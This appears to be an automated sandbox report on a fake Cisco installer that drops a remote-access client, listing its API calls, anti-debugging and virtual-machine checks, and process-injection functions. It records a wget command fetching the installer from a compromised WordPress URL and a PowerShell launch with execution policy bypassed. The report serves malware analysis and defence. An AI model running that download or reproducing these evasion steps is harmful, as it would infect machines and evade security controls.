                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI coverage: 1.2 %
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069C9912_2_11069C99
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 6084 Thread sleep time: -64000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 5428 Thread sleep time: -38700s >= -30000s
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe TID: 6084 Thread sleep time: -1912500s >= -30000s
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689C3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 689C3226h11_2_689C3130
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,11_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110BB80 GetLocalTime,wsprintfA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,ExpandEnvironmentStringsA,CreateFileA,timeBeginPeriod,GetLocalTime,timeGetTime,WriteFile,11_2_1110BB80
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1102CE2D InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,GetModuleFileNameA,GetFileAttributesA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,12_2_1102CE2D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11123570 GetVersionExA,GetTempPathA,GetModuleFileNameA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,12_2_11123570
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11069690 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,12_2_11069690
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11107FE0 wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,12_2_11107FE0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_110BC3D0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,12_2_110BC3D0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11064E30 CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,12_2_11064E30
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,12_2_68C4CA9B
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50B33
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4EFE1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50F84
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,12_2_68C4C775
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C50702
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4F8B5
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode,12_2_68C4DA38
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C17C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C17C6D
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose,12_2_68C4FD86
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C4DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,12_2_68C4DF35
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C76C74 _resetstkoflw,VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,12_2_68C76C74
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMware
                                  Source: client32.exe, 0000000C.00000003.69247612661.0000000000751000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000C.00000002.69248903801.0000000000754000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: client32.exe, 0000000B.00000002.70083577485.000000000571F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70081065717.00000000005DE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000B.00000003.69437076663.000000000571F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: VMWare
                                  Source: wget.exe, 00000002.00000002.68845954829.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000D.00000002.69329567486.0000000000636000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000D.00000003.69328469762.0000000000633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: client32.exe, 0000000B.00000002.70082720696.0000000003250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWc
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-87516
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end nodegraph_11-87423
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1116A559 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110CFCF0 CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA,11_2_110CFCF0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C76C74 VirtualProtect ?,-00000001,00000104,?12_2_68C76C74
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029230
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1108B300 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,11_2_1108B300
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_11030B10 SetUnhandledExceptionFilter,11_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_689D28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_689D28E1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_11030B10 SetUnhandledExceptionFilter,12_2_11030B10
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1116A559 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_1116A559
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_1115E4D1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C00807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_68C00807
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C7ADFC _crt_debugger_hook,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,12_2_68C7ADFC
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 12_2_68C7C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_68C7C16F

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError,11_2_110F2280
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1110F410 GetKeyState,DeviceIoControl,keybd_event,11_2_1110F410
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
                                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/ciscosetup.exe" > cmdline.out 2>&1
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/ciscosetup.exe"
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,11_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeCode function: 11_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,11_2_1109DC20
                                  Source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: Progman
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,11_2_11170208
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,11_2_1117053C
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: EnumSystemLocalesA,11_2_11170499
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoA,11_2_11167B5E
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoA,11_2_11170106
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,11_2_111701AD
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_11170011
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoA,11_2_111703D9
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: EnumSystemLocalesA,11_2_11170500
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_689DFAE1
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,12_2_1117053C
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoA,12_2_11167B5E
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_11170011
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: EnumSystemLocalesA,12_2_11170500
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: EnumSystemLocalesA,12_2_11170499
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,_invoke_watson,12_2_68C0888A
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,strlen,EnumSystemLocalesA,strcpy_s,_invoke_watson,12_2_68C08468
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,12_2_68C065F0
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,12_2_68C085AC
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,12_2_68C086E1
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,12_2_68C0871C
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: GetLocaleInfoW,strlen,12_2_68C7F0DB
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: _getptd,GetLocaleInfoA,_stricmp,12_2_68C7F034
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,strlen,GetLocaleInfoA,_stricmp,strlen,_stricmp,12_2_68C7F136
Source: C:\Windows\SysWOW64\wget.exe | Queries volume information: C:\Users\user\Desktop\download VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
